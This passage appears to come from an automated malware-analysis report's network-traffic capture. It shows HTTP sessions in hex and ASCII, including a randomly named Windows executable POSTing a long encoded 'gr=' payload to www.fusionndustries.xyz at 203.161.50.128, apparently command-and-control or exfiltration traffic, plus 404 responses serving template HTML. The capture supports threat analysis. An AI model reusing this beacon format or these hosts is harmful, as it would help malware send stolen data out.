                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 66 61 6d 69 6c 79 3d 4a 6f 73 74 3a 77 67 68 74 40 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65 73 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 61 6e 69 6d 61 74 65 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6c 69 67 68 74 62 6f 78 2f 63 73 73 2f
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>DGital - Digital Agency HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500&family=Jost:wght@500;600;700&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" rel="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <link href="lib/lightbox/css/
                                                                                                      Apr 16, 2024 12:01:07.532733917 CEST1289INData Raw: 6c 69 67 68 74 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d
                                                                                                      Data Ascii: lightbox.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><bo
                                                                                                      Apr 16, 2024 12:01:07.532773018 CEST1289INData Raw: 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 22 6e 61 76 62 61 72 43 6f 6c 6c 61 70 73 65 22 3e 0d
                                                                                                      Data Ascii: tton> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav mx-auto py-0"> <a href="index.html" class="nav-item nav-link">Home</a>
                                                                                                      Apr 16, 2024 12:01:07.532813072 CEST1289INData Raw: 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 78 78 6c 20 70 79 2d 35 20 62 67
                                                                                                      Data Ascii: </div> </nav> <div class="container-xxl py-5 bg-primary hero-header"> <div class="container my-5 py-5 px-lg-5"> <div class="row g-5 py-5"> <div c
                                                                                                      Apr 16, 2024 12:01:07.532852888 CEST1289INData Raw: 20 70 78 2d 6c 67 2d 35 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 22 3e 0d 0a
                                                                                                      Data Ascii: px-lg-5 text-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary"></i> <h
                                                                                                      Apr 16, 2024 12:01:07.532890081 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e 3c 2f 69 3e 69 6e 66 6f 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 3c 2f 70 3e 0d 0a 20 20 20
                                                                                                      Data Ascii: <p><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-twitter"></i></a
                                                                                                      Apr 16, 2024 12:01:07.532928944 CEST1289INData Raw: 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 35 20 6d 62 2d 34 22 3e 47 61 6c 6c 65 72 79 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: ss="section-title text-white h5 mb-4">Gallery<span></span></p> <div class="row g-2"> <div class="col-4"> <img class="img-fluid" src="img/portfolio-1.jpg" al
                                                                                                      Apr 16, 2024 12:01:07.532969952 CEST1289INData Raw: 2d 36 20 63 6f 6c 2d 6c 67 2d 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 35 20 6d 62 2d 34 22
                                                                                                      Data Ascii: -6 col-lg-3"> <p class="section-title text-white h5 mb-4">Newsletter<span></span></p> <p>Lorem ipsum dolor sit amet elit. Phasellus nec pretium mi. Curabitur facilisis ornare velit non vulpu</p
                                                                                                      Apr 16, 2024 12:01:07.533127069 CEST1289INData Raw: 69 6e 6b 2f 62 61 63 6b 6c 69 6e 6b 2c 20 79 6f 75 20 63 61 6e 20 70 75 72 63 68 61 73 65 20 74 68 65 20 43 72 65 64 69 74 20 52 65 6d 6f 76 61 6c 20 4c 69 63 65 6e 73 65 20 66 72 6f 6d 20 22 68 74 74 70 73 3a 2f 2f 68 74 6d 6c 63 6f 64 65 78 2e
                                                                                                      Data Ascii: ink/backlink, you can purchase the Credit Removal License from "https://htmlcodex.com/credit-removal". Thank you for your support. ***/-->Designed By <a class="border-bottom" href="https://htmlcodex.com">HTML Codex</a>
                                                                                                      Apr 16, 2024 12:01:07.533163071 CEST379INData Raw: 61 79 70 6f 69 6e 74 73 2f 77 61 79 70 6f 69 6e 74 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6c 69 62 2f 63 6f 75 6e 74 65 72 75 70 2f 63 6f 75 6e 74 65 72 75 70 2e 6d 69 6e
                                                                                                      Data Ascii: aypoints/waypoints.min.js"></script> <script src="lib/counterup/counterup.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <script src="lib/isotope/isotope.pkgd.min.js"></script> <script src="li


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      27192.168.2.549746203.161.50.128802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:10.055141926 CEST1761OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.fusionndustries.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.fusionndustries.xyz
                                                                                                      Referer: http://www.fusionndustries.xyz/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 38 4c 73 4a 73 54 77 41 57 68 67 48 33 2f 6c 6f 62 73 59 68 55 6c 69 4a 6b 79 55 39 7a 30 36 2b 47 45 34 41 33 66 50 71 63 7a 50 37 52 6b 2b 65 64 64 75 51 50 77 4e 36 31 63 45 72 47 38 33 62 32 32 37 48 6d 37 38 70 35 44 78 31 59 33 63 65 5a 72 57 34 47 37 39 41 39 52 56 57 2b 43 53 4b 4a 36 5a 31 62 72 7a 39 36 38 6c 42 41 35 4d 39 43 68 72 45 63 69 36 39 4e 66 39 56 73 4e 46 35 63 58 57 54 43 63 7a 46 53 41 76 30 64 65 35 30 44 4b 76 59 77 6d 7a 4c 61 42 70 4a 69 6b 50 55 6d 79 36 5a 35 6d 51 6a 64 4a 36 56 77 51 31 42 4f 79 6b 37 44 2f 72 67 4a 42 38 31 66 55 45 6f 4f 59 50 63 2f 67 48 2b 70 78 76 72 64 2b 77 37 4f 6d 6e 2b 77 42 67 31 49 50 44 39 31 44 41 66 46 41 37 58 47 59 7a 65 61 37 67 45 31 2f 41 4d 33 37 6d 73 50 55 6c 6a 47 43 53 6f 34 63 49 32 2f 5a 36 4e 6c 61 33 77 68 4f 32 53 46 30 35 36 68 43 30 65 7a 61 41 67 52 78 67 78 64 42 75 38 34 46 63 56 41 5a 65 6f 2f 32 43 68 52 48 38 4d 70 4c 48 55 33 4e 74 4b 63 4a 75 4e 4d 45 2b 56 48 52 49 49 36 6c 64 59 41 46 4e 51 78 56 55 50 79 73 62 79 57 74 30 51 4e 79 55 42 2f 38 61 47 68 78 75 74 78 77 53 55 34 79 66 43 39 6c 73 45 38 4f 7a 73 2b 43 49 45 36 7a 66 66 4a 6c 43 5a 52 34 56 4f 31 61 59 33 31 46 68 37 65 78 72 52 35 51 56 35 41 2f 5a 2b 34 41 44 6e 41 56 70 30 4a 48 46 45 32 61 38 32 39 72 77 77 7a 6e 63 6f 62 79 75 55 5a 33 39 38 73 2b 47 6b 48 53 48 5a 76 39 6f 6c 31 6f 32 7a 77 2b 48 63 32 62 6f 78 31 37 54 6a 49 30 42 39 76 75 71 30 50 45 6f 69 53 48 69 56 71 63 68 4d 35 70 67 58 57 39 2b 52 51 75 78 4e 6c 36 2f 77 49 75 2f 43 35 4c 6c 6b 41 4b 49 34 6d 76 43 2f 6d 51 6a 53 45 68 36 37 67 53 73 6a 34 71 35 71 57 63 78 71 5a 30 44 62 36 4b 54 32 6a 33 45 55 4d 49 39 42 43 59 6f 76 33 71 5a 73 32 66 4b 68 7a 50 37 4f 6f 58 55 39 45 6d 74 39 49 57 66 4b 33 37 61 46 47 77 5a 37 74 52 4c 71 67 57 46 79 70 4f 61 79 45 4d 2b 7a 64 63 39 73 69 4a 6b 78 52 38 52 63 76 4d 75 4f 4b 70 50 79 73 75 4d 63 45 5a 55 66 36 54 35 70 66 32 48 45 48 2b 62 77 47 4f 72 58 34 37 58 6b 4a 34 32 49 35 79 53 6f 39 71 70 77 30 50 36 75 78 4d 65 57 59 55 65 4b 57 6e 74 2b 4b 64 64 4e 49 63 67 5a 61 4e 6e 67 6a 79 45 79 50 39 67 39 35 69 71 54 56 48 74 4e 41 55 78 4e 4c 2b 30 54 7a 62 59 4f 69 66 37 4f 6f 64 6a 61 69 73 43 30 32 52 76 41 51 5a 4e 63 71 47 35 62 49 52 4f 71 70 69 5a 2f 61 30 63 78 50 65 47 38 62 64 74 54 50 41 4e 74 7a 51 70 2b 6c 51 38 52 6f 30 75 6e 64 79 70 58 65 51 74 53 6b 72 63 74 2b 6a 4d 4f 74 6d 45 4e 75 4b 30 6b 4f 36 53 6a 68 42 4b 39 68 36 43 34 45 31 61 5a 38 46 76 2f 34 35 62 72 2f 49 47 39 54 2f 4b 67 4b 41 2f 46 42 64 6c 69 6a 52 39 49 47 6b 79 49 38 49 4f 62 46 51 79 39 4a 54 6a 59 5a 48 61 79 7a 58 4d 31 49 68 68 51 30 38 76 68 73 46 6e 7a 6f 69 64 33 5a 67 57 4b 63 69 4a 48 61 51 36 37 53 73 54 76 34 2b 4a 5a 2b 59 44 6d 74 38 46 72 73 77 58 41 78 35 63 4e 35 6a 65 76 51 4e 48 59 56 6a 50 72 7a 69 6b 44 7a 38 70 48 73 7a 41 34 52 6c 49 55 76 75 4c 43 34 76 67 2b 6c 48 32 5a 2b 78 2b 6a 47 59 6b 31 48 48 66 73 35 4f 30 70 46 2f 6f 5a 75 52 46 48 4c 2b 6c 6e 74 6d 79 65 5a 35 70 2f 42 49 6f 4e 4f 36 6f 73 6c 2f 7a 6f 38 56 48 36 54 36 51 6e 49 71 41 6b 4e 59 79 4e 2b 4a 5a 69 75 33 2f 4e 35 6b 44 42 53 55 73 6b 55 4b 32 76 52 57 77 63 62 59 47 65 59 33 54 68 67 48 63 57 35 63 31 63 36 31 4a 67 6d 43 41 31 69 53 39 62 46 4e 59 46 2b 6a 7a 66 4f 73 4e 48 72 45 31 69 59 48 72 77 43 6e 47 6c 52 57 4f 67 6f 54 42 64 44 58 57 42 34 39 46 6d 4e 4f 42 4a 52 4b 79 6c 52 4c 61 36 6c 43 30 73 54 39 34 56 42 37 54 53 37 61 51 39 6d 4d 58 71 34 35 33 53 54 43 73 58 71 30 61 4d 38 50 6b 34 4e 68 52 6e 68 56 63 50 6a 46 33 64 2b 44 77 62 7a 46 36 35 75 63 63 64 4c 68 4c 32 46 50 37 4a 66 49 71 52 34 30 72 2f 6b 2f 64 48 43 37 42 30 36 45 5a 47 68 52 57 77 6b 6a 55 57 58 41 3d 3d
                                                                                                      Data Ascii: gr=8LsJsTwAWhgH3/lobsYhUliJkyU9z06+GE4A3fPqczP7Rk+edduQPwN61cErG83b227Hm78p5Dx1Y3ceZrW4G79A9RVW+CSKJ6Z1brz968lBA5M9ChrEci69Nf9VsNF5cXWTCczFSAv0de50DKvYwmzLaBpJikPUmy6Z5mQjdJ6VwQ1BOyk7D/rgJB81fUEoOYPc/gH+pxvrd+w7Omn+wBg1IPD91DAfFA7XGYzea7gE1/AM37msPUljGCSo4cI2/Z6Nla3whO2SF056hC0ezaAgRxgxdBu84FcVAZeo/2ChRH8MpLHU3NtKcJuNME+VHRII6ldYAFNQxVUPysbyWt0QNyUB/8aGhxutxwSU4yfC9lsE8Ozs+CIE6zffJlCZR4VO1aY31Fh7exrR5QV5A/Z+4ADnAVp0JHFE2a829rwwzncobyuUZ398s+GkHSHZv9ol1o2zw+Hc2box17TjI0B9vuq0PEoiSHiVqchM5pgXW9+RQuxNl6/wIu/C5LlkAKI4mvC/mQjSEh67gSsj4q5qWcxqZ0Db6KT2j3EUMI9BCYov3qZs2fKhzP7OoXU9Emt9IWfK37aFGwZ7tRLqgWFypOayEM+zdc9siJkxR8RcvMuOKpPysuMcEZUf6T5pf2HEH+bwGOrX47XkJ42I5ySo9qpw0P6uxMeWYUeKWnt+KddNIcgZaNngjyEyP9g95iqTVHtNAUxNL+0TzbYOif7OodjaisC02RvAQZNcqG5bIROqpiZ/a0cxPeG8bdtTPANtzQp+lQ8Ro0undypXeQtSkrct+jMOtmENuK0kO6SjhBK9h6C4E1aZ8Fv/45br/IG9T/KgKA/FBdlijR9IGkyI8IObFQy9JTjYZHayzXM1IhhQ08vhsFnzoid3ZgWKciJHaQ67SsTv4+JZ+YDmt8FrswXAx5cN5jevQNHYVjPrzikDz8pHszA4RlIUvuLC4vg+lH2Z+x+jGYk1HHfs5O0pF/oZuRFHL+lntmyeZ5p/BIoNO6osl/zo8VH6T6QnIqAkNYyN+JZiu3/N5kDBSUskUK2vRWwcbYGeY3ThgHcW5c1c61JgmCA1iS9bFNYF+jzfOsNHrE1iYHrwCnGlRWOgoTBdDXWB49FmNOBJRKylRLa6lC0sT94VB7TS7aQ9mMXq453STCsXq0aM8Pk4NhRnhVcPjF3d+DwbzF65uccdLhL2FP7JfIqR40r/k/dHC7B06EZGhRWwkjUWXA==
                                                                                                      Apr 16, 2024 12:01:10.223800898 CEST1289INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:10 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 11834
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 66 61 6d 69 6c 79 3d 4a 6f 73 74 3a 77 67 68 74 40 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65 73 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 61 6e 69 6d 61 74 65 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6c 69 67 68 74 62 6f 78 2f 63 73 73 2f
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>DGital - Digital Agency HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500&family=Jost:wght@500;600;700&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" rel="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <link href="lib/lightbox/css/
                                                                                                      Apr 16, 2024 12:01:10.223840952 CEST1289INData Raw: 6c 69 67 68 74 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d
                                                                                                      Data Ascii: lightbox.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><bo
                                                                                                      Apr 16, 2024 12:01:10.223877907 CEST1289INData Raw: 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 22 6e 61 76 62 61 72 43 6f 6c 6c 61 70 73 65 22 3e 0d
                                                                                                      Data Ascii: tton> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav mx-auto py-0"> <a href="index.html" class="nav-item nav-link">Home</a>
                                                                                                      Apr 16, 2024 12:01:10.223916054 CEST1289INData Raw: 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 78 78 6c 20 70 79 2d 35 20 62 67
